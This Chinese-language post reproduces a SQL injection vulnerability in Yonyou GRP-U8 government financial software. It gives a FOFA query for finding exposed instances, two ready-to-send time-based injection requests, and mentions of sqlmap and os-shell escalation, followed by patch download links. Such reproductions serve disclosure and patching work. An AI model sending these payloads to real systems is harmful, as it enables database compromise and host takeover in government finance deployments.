用友GRP-U8 SQL注入漏洞复现

0x01 产品简介

用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。

0x02 漏洞概述

用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞,由于用友GRP-U8未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞,进一步利用可造成主机失陷。

0x03 影响范围

用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905

0x04 复现环境

FOFA:app="用友-GRP-U8"

0x05 漏洞复现

PoC-1

复制代码
GET /u8qx/slbmbygr.jsp?gsdm=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip

延时5秒

Sqlmap验证

PoC-2

复制代码
POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

userName=';WAITFOR DELAY '0:0:6'--&class.module.classLoader.DefaultAssertionStatus=

延时6秒

利用os-shell命令执行

0x06 修复建议

目前官方已发布更新补丁,获取安全补丁方式如下:

  1. 百度云盘:https://pan.baidu.com/s/1cQIxlUkpYAxE508EXjgQxA 提取码:n1xy

  2. 用友云盘:https://pan.yonyou.com/s/gUWlv8QkSsY密码:a61h

下载【20230905-关于用友GRP-U8 bx_historyDataCheck jsp存在SQL注入漏洞的解决方案.zip】

更新用友GRP-U8 Manager产品的2023年10月份(日期大于等于均可)标准补丁也可以修复此问题。

相关推荐
网硕互联的小客服几秒前
未来趋势:AI与量子计算对服务器安全的影响
运维·服务器·网络·网络安全·量子计算
黑客老李8 分钟前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
玥轩_52117 分钟前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
ManageEngine卓豪36 分钟前
网络工具如何帮助消除网络安全风险
网络安全·网络管理·网络工具
weixin_472339461 小时前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
sam.li1 小时前
WebView安全实现(一)
android·安全·webview
咖啡啡不加糖1 小时前
暴力破解漏洞与命令执行漏洞
java·后端·web安全
weixin_472339461 小时前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
码农12138号7 小时前
BUUCTF在线评测-练习场-WebCTF习题[GXYCTF2019]BabyUpload1-flag获取、解析
web安全·网络安全·文件上传漏洞·buuctf·解析漏洞
Johny_Zhao8 小时前
Docker + CentOS 部署 Zookeeper 集群 + Kubernetes Operator 自动化运维方案
linux·网络安全·docker·信息安全·zookeeper·kubernetes·云计算·系统运维